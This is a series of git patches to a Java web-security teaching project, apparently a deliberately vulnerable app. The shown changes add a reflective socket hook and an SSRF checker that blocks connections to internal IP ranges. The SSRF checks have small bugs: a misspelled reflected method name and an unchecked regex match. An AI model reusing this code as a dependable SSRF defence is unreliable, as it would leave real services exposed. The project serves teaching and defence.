-    public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callbacks) {
+    public Object2Jsonp(@Value("${joychou.security.jsonp.callback}") String[] callbacks) {
         super(callbacks);  // Can set multiple paramNames
         this.callbacks = callbacks;
     }
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index 2f1bcf0a..b678d598 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -63,8 +63,7 @@ static boolean checkSSRF(String url, int checkTimes) {
         try {
             do {
                 // 判断当前请求的URL是否是内网ip
-                Boolean bRet = isInnerIPByUrl(finalUrl);
-                if (bRet) {
+                if (isInnerIPByUrl(finalUrl)) {
                     logger.error("[-] SSRF check failed. Dangerous url: " + finalUrl);
                     return false;  // 内网ip直接return，非内网ip继续判断是否有重定向
                 }
diff --git a/src/main/java/org/joychou/util/LoginUtils.java b/src/main/java/org/joychou/util/LoginUtils.java
new file mode 100644
index 00000000..93ccbd9f
--- /dev/null
+++ b/src/main/java/org/joychou/util/LoginUtils.java
@@ -0,0 +1,21 @@
+package org.joychou.util;
+
+import com.alibaba.fastjson.JSON;
+
+import javax.servlet.http.HttpServletRequest;
+import java.security.Principal;
+import java.util.HashMap;
+import java.util.Map;
+
+public class LoginUtils {
+
+    // get current login username
+    public static String getUserInfo2JsonStr(HttpServletRequest request) {
+        Principal principal = request.getUserPrincipal();
+        String username = principal.getName();
+        Map<String, String> m = new HashMap<>();
+        m.put("Username", username);
+
+        return JSON.toJSONString(m);
+    }
+}

From fa48badb1edcbfb27fae61909b43545c0478d0b2 Mon Sep 17 00:00:00 2001
From: liergou <736540362@qq.com>
Date: Sat, 4 Apr 2020 02:27:05 +0800
Subject: [PATCH 077/108] =?UTF-8?q?=E5=A2=9E=E5=8A=A0socket=20hook?=
 =?UTF-8?q?=E6=A8=A1=E5=9D=97=20=20=E5=AE=9E=E7=8E=B0socket=E5=B1=82?=
 =?UTF-8?q?=E6=8B=A6=E6=88=AASSRF?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../org/joychou/security/SSRFChecker.java     |  15 +-
 .../org/joychou/security/SecurityUtil.java    |  24 ++
 .../java/org/joychou/security/SocketHook.java |  25 ++
 .../joychou/security/SocketHookFactory.java   |  77 +++++
 .../org/joychou/security/SocketHookImpl.java  | 294 ++++++++++++++++++
 .../org/joychou/security/SocketHookUtils.java |  29 ++
 6 files changed, 463 insertions(+), 1 deletion(-)
 create mode 100644 src/main/java/org/joychou/security/SocketHook.java
 create mode 100644 src/main/java/org/joychou/security/SocketHookFactory.java
 create mode 100644 src/main/java/org/joychou/security/SocketHookImpl.java
 create mode 100644 src/main/java/org/joychou/security/SocketHookUtils.java

diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index b678d598..ef393074 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -5,6 +5,8 @@
 import java.net.URI;
 import java.net.URL;
 import java.util.ArrayList;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
 
 import org.apache.commons.net.util.SubnetUtils;
 import org.joychou.config.WebConfig;
@@ -14,6 +16,7 @@
 class SSRFChecker {
 
     private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+    private final static Pattern IP_PATTERN = Pattern.compile("((25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.){3}(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)");
 
     static boolean checkURLFckSSRF(String url) {
         if (null == url){
@@ -122,7 +125,7 @@ static boolean isInnerIPByUrl(String url) {
      * @param strIP ip字符串
      * @return 如果是内网ip，返回true，否则返回false。
      */
-    private static boolean isInnerIp(String strIP){
+     static boolean isInnerIp(String strIP){
 
         ArrayList<String> blackSubnets= WebConfig.getSsrfBlockIps();
 
@@ -176,4 +179,14 @@ private static String url2host(String url) {
         }
 
     }
+
+    /**
+     * 匹配ip
+     * @return
+     */
+     static String getIpFromStr(String ipStr){
+        Matcher matcher = IP_PATTERN.matcher(ipStr);
+        System.out.println(matcher.find());
+        return matcher.group();
+    }
 }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 14cc397f..2cbe52ab 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -4,6 +4,7 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
+import java.io.IOException;
 import java.io.UnsupportedEncodingException;
 import java.net.URI;
 import java.net.URLDecoder;
@@ -118,6 +119,29 @@ public static boolean checkSSRFWithoutRedirect(String url) {
         return !SSRFChecker.isInnerIPByUrl(url);
     }
 
+    /**
+     * @Author liergou
+     * @Description 基于Socket hook 进行SSRF检测拦截
+     * @Date 2:15 2020/4/4
+     * @Param []
+     * @return void
+     **/
+    public static void startSSRFHook() throws NoSuchFieldException, IOException {
+        SocketHook.startHook();
+    }
+
+    /**
+     * @Author liergou
+     * @Description 关闭Socket hook
+     * @Date 2:15 2020/4/4
+     * @Param []
+     * @return void
+     **/
+    public static void stopSSRFHook(){
+        SocketHook.stopHook();
+    }
+
+
 
     /**
      * Filter file path to prevent path traversal vulns.
diff --git a/src/main/java/org/joychou/security/SocketHook.java b/src/main/java/org/joychou/security/SocketHook.java
new file mode 100644
index 00000000..359e33f3
--- /dev/null
+++ b/src/main/java/org/joychou/security/SocketHook.java
@@ -0,0 +1,25 @@
+package org.joychou.security;
+
+import java.io.IOException;
+import java.net.Socket;
+import java.net.SocketException;
+
+/**
+ * @Author liergou
+ * @Description Socket hook开关自如
+ * @Date 2:12 2020/4/4
+ **/
+class SocketHook {
+    static void startHook() throws NoSuchFieldException, IOException {
+        SocketHookFactory.initSocket();
+        SocketHookFactory.setHook(true);
+        try{
+            Socket.setSocketImplFactory(new SocketHookFactory());
+        }catch (SocketException ignored){
+        }
+    }
+
+    static void stopHook(){
+        SocketHookFactory.setHook(false);
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/SocketHookFactory.java b/src/main/java/org/joychou/security/SocketHookFactory.java
new file mode 100644
index 00000000..2dbe738f
--- /dev/null
+++ b/src/main/java/org/joychou/security/SocketHookFactory.java
@@ -0,0 +1,77 @@
+package org.joychou.security;
+
+
+import java.io.IOException;
+import java.lang.reflect.Field;
+import java.net.Socket;
+import java.net.SocketImpl;
+import java.net.SocketImplFactory;
+import java.util.logging.Level;
+import java.util.logging.Logger;
+
+
+/**
+ * @Author liergou
+ * @Description socket factory impl
+ * @Date 23:41 2020/4/3
+ * @Param
+ * @return
+ **/
+public class SocketHookFactory implements SocketImplFactory
+    {
+        private static SocketImpl   clazz;
+        private static Boolean isHook = false;
+
+        /**
+         * @Author liergou
+         * @Description switch hook
+         * @Date 23:42 2020/4/2
+         * @Param [set]
+         * @return void
+         **/
+        public static void setHook(Boolean set){
+            isHook = set;
+        }
+
+        /**
+         * @Author liergou
+         * @Description 初始化
+         * @Date 23:42 2020/4/2
+         * @Param []
+         * @return void
+         **/
+        public static synchronized void initSocket() throws NoSuchFieldException {
+            if ( clazz != null ) { return; }
+
+            Socket  socket = new Socket();
+            try{
+                Field implField = Socket.class.getDeclaredField("impl");
+                implField.setAccessible( true );
+                clazz = (SocketImpl) implField.get(socket);
+            }catch (NoSuchFieldException | IllegalAccessException e){
+                throw new RuntimeException("SocketHookFactory init failed!");
+            }
+
+            try {
+                socket.close();
+            }
+            catch ( IOException ignored)
+            {
+
+            }
+        }
+
+        public SocketImpl createSocketImpl() {
+
+            if(isHook) {
+                    try {
+                        return new SocketHookImpl(clazz);
+                    } catch (Exception e) {
+                        Logger.getLogger(SocketHookFactory.class.getName()).log(Level.WARNING, "hook 失败  请检查" );
+                        return clazz;
+                    }
+            }else{
+                return clazz;
+            }
+        }
+    }
diff --git a/src/main/java/org/joychou/security/SocketHookImpl.java b/src/main/java/org/joychou/security/SocketHookImpl.java
new file mode 100644
index 00000000..ec41ebac
--- /dev/null
+++ b/src/main/java/org/joychou/security/SocketHookImpl.java
@@ -0,0 +1,294 @@
+package org.joychou.security;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import java.net.*;
+import java.util.logging.Level;
+import java.util.logging.Logger;
+
+/**
+ * @Author liergou
+ * @Description socket impl
+ * @Date 23:39 2020/4/2
+ * @Param
+ * @return
+ **/
+public class SocketHookImpl extends SocketImpl implements SocketOptions
+{
+
+    private SocketImpl socketImpl = null;
+    private Method createImpl;
+    private Method connectHostImpl;
+    private Method connectInetAddressImpl;
+    private Method connectSocketAddressIMPL;
+    private Method bindImpl;
+    private Method listenImpl;
+    private Method acceptImpl;
+    private Method getInputStreamImpl;
+    private Method getOutputStreamImpl;
+    private Method availableImpl;
+    private Method closeImpl;
+    private Method shutdownInputImpl;
+    private Method shutdownOutputImpl;
+    private Method sendUrgentDataImpl;
+
+
+    /**
+     * @Author liergou
+     * @Description 初始化反射方法
+     * @Date 23:40 2020/4/2
+     * @Param [initSocketImpl]
+     * @return
+     **/
+    public SocketHookImpl(SocketImpl initSocketImpl) {
+
+        if ( initSocketImpl == null){
+            throw new RuntimeException("");
+            //TODO close hook
+        }
+
+        this.socketImpl = initSocketImpl;
+        final Class<?>  clazz = this.socketImpl.getClass();
+        Method[] allMethod = clazz.getDeclaredMethods();
+        createImpl = SocketHookUtils.findMethod( clazz,"create", new Class<?>[]{ boolean.class } );
+        connectHostImpl = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ String.class, int.class } );
+        connectInetAddressImpl = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ InetAddress.class, int.class } );
+        connectSocketAddressIMPL = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ SocketAddress.class, int.class } );
+        bindImpl = SocketHookUtils.findMethod( clazz, "bind", new Class<?>[]{ InetAddress.class, int.class } );
+        listenImpl = SocketHookUtils.findMethod( clazz, "listen", new Class<?>[]{ int.class } );
+        acceptImpl = SocketHookUtils.findMethod( clazz, "accept", new Class<?>[]{ SocketImpl.class } );
+        getInputStreamImpl = SocketHookUtils.findMethod( clazz, "getInputStream", new Class<?>[]{  } );
+        getOutputStreamImpl = SocketHookUtils.findMethod( clazz, "getOutputStream", new Class<?>[]{  } );
+        availableImpl = SocketHookUtils.findMethod( clazz, "available", new Class<?>[]{ } );
+        closeImpl = SocketHookUtils.findMethod( clazz, "close", new Class<?>[]{ } );
+        shutdownInputImpl = SocketHookUtils.findMethod( clazz, "shutdownInput", new Class<?>[]{ } );
+        shutdownOutputImpl = SocketHookUtils.findMethod( clazz, "shutdownOutput", new Class<?>[]{ } );
+        sendUrgentDataImpl = SocketHookUtils.findMethod( clazz, "sendUrgantData", new Class<?>[]{ int.class } );
+    }
+
+
+    /**
+     * socket base method impl
+     */
+    @Override
+    protected void create(boolean stream) throws IOException {
+            try
+            {
+                this.createImpl.invoke( this.socketImpl, stream);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+
+    }
+
+    @Override
+    protected void connect(String host, int port) throws IOException {
+        Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "host=" + host + ",port=" + port );
+
+            try
+            {
+                this.connectHostImpl.invoke( this.socketImpl, host, port);
+            }
+            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+
+    }
+
+
+    @Override
+    protected void connect(InetAddress address, int port) throws IOException {
+            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "InetAddress=" + address.toString());
+
+            //start check SSRF
+            if(SSRFChecker.isInnerIp(SSRFChecker.getIpFromStr(address.toString()))){
+                throw new RuntimeException("Socket SSRF check failed. InetAddress:"+address.toString());
+            }
+            try
+            {
+                this.connectInetAddressImpl.invoke( this.socketImpl, address, port);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected void connect(SocketAddress address, int timeout) throws IOException {
+            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "SocketAddress=" + address.toString());
+            //start check SSRF
+            if(SSRFChecker.isInnerIp(SSRFChecker.getIpFromStr(address.toString()))){
+                throw new RuntimeException("Socket SSRF check failed. SocketAddress:"+address.toString());
+            }
+
+            try
+            {
+                this.connectSocketAddressIMPL.invoke( this.socketImpl, address, timeout);
+            }
+            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected void bind(InetAddress host, int port) throws IOException {
+            try
+            {
+                this.bindImpl.invoke( this.socketImpl, host, port);
+            }
+            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected void listen(int backlog) throws IOException {
+
+            try
+            {
+                this.listenImpl.invoke( this.socketImpl, backlog);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected void accept(SocketImpl s) throws IOException {
+
+            try
+            {
+                this.acceptImpl.invoke( this.socketImpl, s);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected InputStream getInputStream() throws IOException {
+        InputStream inStream = null;
+
+            try
+            {
+                inStream = (InputStream)this.getInputStreamImpl.invoke( this.socketImpl);
+            }
+            catch ( ClassCastException | InvocationTargetException | IllegalArgumentException | IllegalAccessException ex )
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+
+        return inStream;
+    }
+
+    @Override
+    protected OutputStream getOutputStream() throws IOException {
+        OutputStream outStream = null;
+
+            try
+            {
+                outStream = (OutputStream)this.getOutputStreamImpl.invoke( this.socketImpl);
+            }
+            catch ( ClassCastException | IllegalArgumentException | IllegalAccessException | InvocationTargetException ex )
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+
+        return outStream;
+    }
+
+    @Override
+    protected int available() throws IOException {
+        int result = -1;
+
+            try
+            {
+                result = (Integer)this.availableImpl.invoke( this.socketImpl);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+
+        return result;
+    }
+
+    @Override
+    protected void close() throws IOException {
+            try
+            {
+                this.closeImpl.invoke( this.socketImpl);
+            }
+            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    @Override
+    protected void shutdownInput() throws IOException {
+        try
+        {
+            this.shutdownInputImpl.invoke( this.socketImpl);
+        }
+        catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+        {
+            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+        }
+
+    }
+
+    @Override
+    protected void shutdownOutput() throws IOException {
+        try
+        {
+            this.shutdownOutputImpl.invoke( this.socketImpl);
+        }
+        catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
+        {
+            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+        }
+
+    }
+
+    @Override
+    protected void sendUrgentData(int data) throws IOException {
+            try
+            {
+                this.sendUrgentDataImpl.invoke( this.socketImpl, data);
+            }
+            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
+            {
+                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
+            }
+    }
+
+    public void setOption(int optID, Object value) throws SocketException {
+        if ( null != this.socketImpl )
+        {
+            this.socketImpl.setOption( optID, value );
+        }
+    }
+
+    public Object getOption(int optID) throws SocketException {
+        return this.socketImpl.getOption( optID );
+    }
+
+    /**
+     * dont impl other child method now
+     * dont sure where will use it
+     **/
+
+
+}
diff --git a/src/main/java/org/joychou/security/SocketHookUtils.java b/src/main/java/org/joychou/security/SocketHookUtils.java
new file mode 100644
index 00000000..75d48707
--- /dev/null
+++ b/src/main/java/org/joychou/security/SocketHookUtils.java
@@ -0,0 +1,29 @@
+package org.joychou.security;
+
+import java.lang.reflect.Method;
+
+public class SocketHookUtils {
+
+    /**
+     * @Author liergou
+     * @Description 轮询父类查找反射方法
+     * @Date 1:43 2020/4/4
+     * @Param [inputClazz, findName, args]
+     * @return java.lang.reflect.Method
+     **/
+    public static Method findMethod(Class<?> inputClazz, String findName ,Class<?>[] args){
+        Class<?> temp=inputClazz;
+        Method tmpMethod = null;
+        while(temp!=null){
+            try{
+                tmpMethod = temp.getDeclaredMethod(findName,args);
+                tmpMethod.setAccessible(true);
+                return tmpMethod;
+            }catch (NoSuchMethodException e){
+                temp=temp.getSuperclass();
+            }
+        }
+        return null;
+    }
+
+}

From 335bfef5cb34d2e7e0a6f822226c82c7a8b37b80 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sat, 4 Apr 2020 23:39:27 +0800
Subject: [PATCH 078/108] fix hook socket's bug

---
 README.md                                     |   2 +-
 .../java/org/joychou/config/Constants.java    |   3 +-
 .../org/joychou/config/SafeDomainParser.java  |  20 +-
 .../java/org/joychou/config/WebConfig.java    |  66 ++--
 .../org/joychou/controller/CRLFInjection.java |   2 +-
 .../java/org/joychou/controller/CSRF.java     |   2 +-
 .../org/joychou/controller/CommandInject.java |   1 -
 .../java/org/joychou/controller/Cookies.java  |   7 +-
 .../java/org/joychou/controller/Cors.java     |   4 +-
 .../org/joychou/controller/Deserialize.java   |  10 +-
 .../java/org/joychou/controller/Fastjson.java |  10 +-
 .../org/joychou/controller/FileUpload.java    |  39 +--
 .../org/joychou/controller/GetRequestURI.java |  18 +-
 .../java/org/joychou/controller/IPForge.java  |  16 +-
 .../java/org/joychou/controller/Jsonp.java    |  10 +-
 .../java/org/joychou/controller/Login.java    |   2 +-
 .../org/joychou/controller/PathTraversal.java |   6 +-
 src/main/java/org/joychou/controller/Rce.java |  26 +-
 .../java/org/joychou/controller/SQLI.java     |  64 ++--
 .../java/org/joychou/controller/SSRF.java     |  62 ++--
 .../java/org/joychou/controller/SSTI.java     |   4 +-
 .../java/org/joychou/controller/SpEL.java     |  10 +-
 .../java/org/joychou/controller/Test.java     |   3 +-
 .../org/joychou/controller/URLRedirect.java   |  17 +-
 .../org/joychou/controller/URLWhiteList.java  |  67 ++--
 src/main/java/org/joychou/controller/XSS.java |  12 +-
 .../org/joychou/controller/XStreamRce.java    |   8 +-
 src/main/java/org/joychou/controller/XXE.java |  58 ++--
 .../controller/othervulns/ooxmlXXE.java       |  28 +-
 .../othervulns/xlsxStreamerXXE.java           |   6 +-
 .../java/org/joychou/filter/OriginFilter.java |  10 +-
 .../java/org/joychou/filter/ReferFilter.java  |  14 +-
 .../org/joychou/security/SecurityUtil.java    |  22 +-
 .../joychou/security/SocketHookFactory.java   |  77 -----
 .../org/joychou/security/SocketHookImpl.java  | 294 ------------------
 .../org/joychou/security/SocketHookUtils.java |  29 --
 .../security/{ => ssrf}/SSRFChecker.java      |  62 ++--
 .../joychou/security/ssrf/SSRFException.java  |  15 +
 .../security/{ => ssrf}/SocketHook.java       |  18 +-
 .../security/ssrf/SocketHookFactory.java      |  87 ++++++
 .../joychou/security/ssrf/SocketHookImpl.java | 270 ++++++++++++++++
 .../security/ssrf/SocketHookUtils.java        |  28 ++
 src/main/java/org/joychou/util/WebUtils.java  |  16 +
 43 files changed, 747 insertions(+), 778 deletions(-)
 delete mode 100644 src/main/java/org/joychou/security/SocketHookFactory.java
 delete mode 100644 src/main/java/org/joychou/security/SocketHookImpl.java
 delete mode 100644 src/main/java/org/joychou/security/SocketHookUtils.java
 rename src/main/java/org/joychou/security/{ => ssrf}/SSRFChecker.java (77%)
 create mode 100644 src/main/java/org/joychou/security/ssrf/SSRFException.java
 rename src/main/java/org/joychou/security/{ => ssrf}/SocketHook.java (59%)
 create mode 100644 src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
 create mode 100644 src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
 create mode 100644 src/main/java/org/joychou/security/ssrf/SocketHookUtils.java

diff --git a/README.md b/README.md
index 9ee7a881..2c0a0bc8 100644
--- a/README.md
+++ b/README.md
@@ -190,7 +190,7 @@ Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-op
 
 ## Contributors
 
-Core developers : [JoyChou](https://github.com/JoyChou93).
+Core developers : [JoyChou](https://github.com/JoyChou93), [liergou9981](https://github.com/liergou9981)
 Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95), [waderwu](https://github.com/waderwu). 
 
 
diff --git a/src/main/java/org/joychou/config/Constants.java b/src/main/java/org/joychou/config/Constants.java
index 62379458..ef6ee45e 100644
--- a/src/main/java/org/joychou/config/Constants.java
+++ b/src/main/java/org/joychou/config/Constants.java
@@ -2,7 +2,8 @@
 
 public class Constants {
 
-    private Constants(){}
+    private Constants() {
+    }
 
     public static final String REMEMBER_ME_COOKIE = "rememberMe";
 }
diff --git a/src/main/java/org/joychou/config/SafeDomainParser.java b/src/main/java/org/joychou/config/SafeDomainParser.java
index 82859444..6157f645 100644
--- a/src/main/java/org/joychou/config/SafeDomainParser.java
+++ b/src/main/java/org/joychou/config/SafeDomainParser.java
@@ -14,9 +14,9 @@
 
 public class SafeDomainParser {
 
-    private static Logger logger= LoggerFactory.getLogger(SafeDomainParser.class);
+    private static Logger logger = LoggerFactory.getLogger(SafeDomainParser.class);
 
-    public SafeDomainParser(){
+    public SafeDomainParser() {
 
         String rootTag = "domains";
         String safeDomainTag = "safedomains";
@@ -38,8 +38,8 @@ public SafeDomainParser(){
             NodeList rootNode = doc.getElementsByTagName(rootTag);  // 解析根节点domains
             Node domainsNode = rootNode.item(0);
             NodeList child = domainsNode.getChildNodes();
-            
-            for (int i = 0; i < child.getLength(); i++){
+
+            for (int i = 0; i < child.getLength(); i++) {
                 Node node = child.item(i);
                 // 解析safeDomains节点
                 if (node.getNodeName().equals(safeDomainTag)) {
@@ -51,7 +51,7 @@ public SafeDomainParser(){
                             safeDomains.add(finalTagNode.getTextContent());
                         }
                     }
-                }else if (node.getNodeName().equals(blockDomainTag)) {
+                } else if (node.getNodeName().equals(blockDomainTag)) {
                     NodeList finalTagNode = node.getChildNodes();
                     for (int j = 0; j < finalTagNode.getLength(); j++) {
                         Node tagNode = finalTagNode.item(j);
@@ -62,7 +62,7 @@ public SafeDomainParser(){
                     }
                 }
             }
-        }catch (Exception e){
+        } catch (Exception e) {
             logger.error(e.toString());
         }
 
@@ -96,7 +96,7 @@ public SafeDomainParser(){
             Node domainsNode = rootNode.item(0);
             NodeList child = domainsNode.getChildNodes();
 
-            for (int i = 0; i < child.getLength(); i++){
+            for (int i = 0; i < child.getLength(); i++) {
                 Node node = child.item(i);
                 // 解析safeDomains节点
                 if (node.getNodeName().equals(ssrfSafeDomainTag)) {
@@ -107,7 +107,7 @@ public SafeDomainParser(){
                             ssrfSafeDomains.add(tagFinalNode.getTextContent());
                         }
                     }
-                }else if (node.getNodeName().equals(ssrfBlockDomainTag)) {
+                } else if (node.getNodeName().equals(ssrfBlockDomainTag)) {
                     NodeList tagChild = node.getChildNodes();
                     for (int j = 0; j < tagChild.getLength(); j++) {
                         Node tagFinalNode = tagChild.item(j);
@@ -115,7 +115,7 @@ public SafeDomainParser(){
                             ssrfBlockDomains.add(tagFinalNode.getTextContent());
                         }
                     }
-                }else if(node.getNodeName().equals(ssrfBlockIpsTag)){
+                } else if (node.getNodeName().equals(ssrfBlockIpsTag)) {
                     NodeList tagChild = node.getChildNodes();
                     for (int j = 0; j < tagChild.getLength(); j++) {
                         Node tagFinalNode = tagChild.item(j);
@@ -126,7 +126,7 @@ public SafeDomainParser(){
                     }
                 }
             }
-        }catch (Exception e){
+        } catch (Exception e) {
             logger.error(e.toString());
         }
 
diff --git a/src/main/java/org/joychou/config/WebConfig.java b/src/main/java/org/joychou/config/WebConfig.java
index 2dfdee19..28ee6967 100644
--- a/src/main/java/org/joychou/config/WebConfig.java
+++ b/src/main/java/org/joychou/config/WebConfig.java
@@ -15,112 +15,124 @@
 public class WebConfig {
 
     private static String[] callbacks;
-    private static Boolean  jsonpReferCheckEnabled = false;
+    private static Boolean jsonpReferCheckEnabled = false;
     private static String[] jsonpRefererHost;
     private static String[] referWhitelist;
     private static String[] referUris;
     private static Boolean referSecEnabled = false;
     private static String businessCallback;
-    private static ArrayList<String> safeDomains= new ArrayList<>();
-    private static ArrayList<String> blockDomains= new ArrayList<>();
+    private static ArrayList<String> safeDomains = new ArrayList<>();
+    private static ArrayList<String> blockDomains = new ArrayList<>();
     private static ArrayList<String> ssrfSafeDomains = new ArrayList<>();
-    private static ArrayList<String> ssrfBlockDomains= new ArrayList<>();
+    private static ArrayList<String> ssrfBlockDomains = new ArrayList<>();
     private static ArrayList<String> ssrfBlockIps = new ArrayList<>();
+
     /**
      * application.properties里object自动转jsonp的referer校验开关
+     *
      * @param jsonpReferCheckEnabled jsonp校验开关
      */
     @Value("${joychou.security.jsonp.referer.check.enabled}")
-    public void setJsonpReferCheckEnabled(Boolean jsonpReferCheckEnabled){
+    public void setJsonpReferCheckEnabled(Boolean jsonpReferCheckEnabled) {
         WebConfig.jsonpReferCheckEnabled = jsonpReferCheckEnabled;
     }
-    public static Boolean getJsonpReferCheckEnabled(){
+
+    public static Boolean getJsonpReferCheckEnabled() {
         return jsonpReferCheckEnabled;
     }
 
 
     @Value("${joychou.security.jsonp.callback}")
-    public void setJsonpCallbacks(String[] callbacks){
+    public void setJsonpCallbacks(String[] callbacks) {
         WebConfig.callbacks = callbacks;
     }
-    public static String[] getJsonpCallbacks(){
+
+    public static String[] getJsonpCallbacks() {
         return callbacks;
     }
 
 
     @Value("${joychou.security.referer.enabled}")
-    public void setReferSecEnabled(Boolean referSecEnabled){
+    public void setReferSecEnabled(Boolean referSecEnabled) {
         WebConfig.referSecEnabled = referSecEnabled;
     }
-    public static Boolean getReferSecEnabled(){
+
+    public static Boolean getReferSecEnabled() {
         return referSecEnabled;
     }
 
 
     @Value("${joychou.security.referer.host}")
-    public void setReferWhitelist(String[] referWhitelist){
+    public void setReferWhitelist(String[] referWhitelist) {
         WebConfig.referWhitelist = referWhitelist;
     }
-    public static String[] getReferWhitelist(){
+
+    public static String[] getReferWhitelist() {
         return referWhitelist;
     }
 
 
     @Value("${joychou.security.referer.uri}")
-    public void setReferUris(String[] referUris)
-    {
+    public void setReferUris(String[] referUris) {
         WebConfig.referUris = referUris;
     }
-    public static String[] getReferUris(){
+
+    public static String[] getReferUris() {
         return referUris;
     }
 
 
     @Value("${joychou.business.callback}")
-    public void setBusinessCallback(String businessCallback){
+    public void setBusinessCallback(String businessCallback) {
         WebConfig.businessCallback = businessCallback;
     }
-    public static String getBusinessCallback(){
+
+    public static String getBusinessCallback() {
         return businessCallback;
     }
 
 
-    void setSafeDomains(ArrayList<String> safeDomains){
+    void setSafeDomains(ArrayList<String> safeDomains) {
         WebConfig.safeDomains = safeDomains;
     }
-    public static ArrayList<String> getSafeDomains(){
+
+    public static ArrayList<String> getSafeDomains() {
         return safeDomains;
     }
 
 
-    void setBlockDomains(ArrayList<String> blockDomains){
+    void setBlockDomains(ArrayList<String> blockDomains) {
         WebConfig.blockDomains = blockDomains;
     }
-    public static ArrayList<String> getBlockDomains(){
+
+    public static ArrayList<String> getBlockDomains() {
         return blockDomains;
     }
 
 
-    void setSsrfSafeDomains(ArrayList<String> ssrfSafeDomains){
+    void setSsrfSafeDomains(ArrayList<String> ssrfSafeDomains) {
         WebConfig.ssrfSafeDomains = ssrfSafeDomains;
     }
-    public static ArrayList<String> getSsrfSafeDomains(){
+
+    public static ArrayList<String> getSsrfSafeDomains() {
         return ssrfSafeDomains;
     }
 
 
-    void setSsrfBlockDomains(ArrayList<String> ssrfBlockDomains){
+    void setSsrfBlockDomains(ArrayList<String> ssrfBlockDomains) {
         WebConfig.ssrfBlockDomains = ssrfBlockDomains;
     }
-    public static ArrayList<String> getSsrfBlockDomainsDomains(){
+
+    public static ArrayList<String> getSsrfBlockDomainsDomains() {
         return ssrfBlockDomains;
     }
 
 
-    void setSsrfBlockIps(ArrayList<String> ssrfBlockIps){
+    void setSsrfBlockIps(ArrayList<String> ssrfBlockIps) {
         WebConfig.ssrfBlockIps = ssrfBlockIps;
     }
-    public static ArrayList<String> getSsrfBlockIps(){
+
+    public static ArrayList<String> getSsrfBlockIps() {
         return ssrfBlockIps;
     }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/CRLFInjection.java b/src/main/java/org/joychou/controller/CRLFInjection.java
index 4fb66ba7..b0b0e9f2 100644
--- a/src/main/java/org/joychou/controller/CRLFInjection.java
+++ b/src/main/java/org/joychou/controller/CRLFInjection.java
